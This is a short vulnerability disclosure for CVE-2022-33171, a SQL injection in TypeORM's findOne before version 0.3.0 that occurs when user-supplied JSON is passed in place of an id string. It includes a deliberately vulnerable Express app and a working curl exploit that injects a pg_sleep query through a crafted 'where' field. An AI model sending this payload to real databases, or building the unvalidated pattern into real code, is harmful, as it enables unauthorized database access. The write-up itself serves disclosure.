typeorm CVE-2022-33171

findOne(id), findOneOrFail(id)

The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection.

The issue was already fixed from version 0.3.0 onward when we encountered it.

Maintainer does not consider this a vulnerability and stated the root cause is bad input validation.

On one hand input validation is definitely insufficient. On the other hand this is a function argument that is meant to be fed user input and as such one would think it safe to put user input there.

Vulnerable app:
```

import {
  Entity,
  PrimaryGeneratedColumn,
  Connection,
  ConnectionOptions,
  Repository,
  createConnection
} from 'typeorm';
import * as express from 'express';
import {Application, Request, Response} from 'express';

let connection: Connection;

async function myListener(request: Request, response: Response) {
  if(!connection)
    connection = await createConnection(connectionOpts);
  const userRepo: Repository<User> = connection.getRepository(User);

  const ids: string[] = request.body;
  for(const id of ids) {
    try {
      await userRepo.findOne(id);
    } catch(err: any) {
      console.log(err);
    }
  }
  response.json({});
}

@Entity({ name: 'user' })
class User {
    @PrimaryGeneratedColumn('uuid')
    id: string;
}

const connectionOpts: ConnectionOptions = {
  type: 'postgres',
  name: 'myconnection',
  host: 'db-host',
  port: 5432,
  username: 'username',
  password: 'password',
  database: 'mydb',
  schema: 'public',
  entities: [User]
}

const app: Application = express();
app.use(express.json());
app.post( "/findByIds", myListener);
app.listen(4444, () => console.log('App started'));

```

Exploit:
curl -v [http://host/findByIds](http://containerip:4444/findByIds)' -H 'Content-Type: application/json' --data '[{"where":"1=1; SELECT pg_sleep(10) --"}]'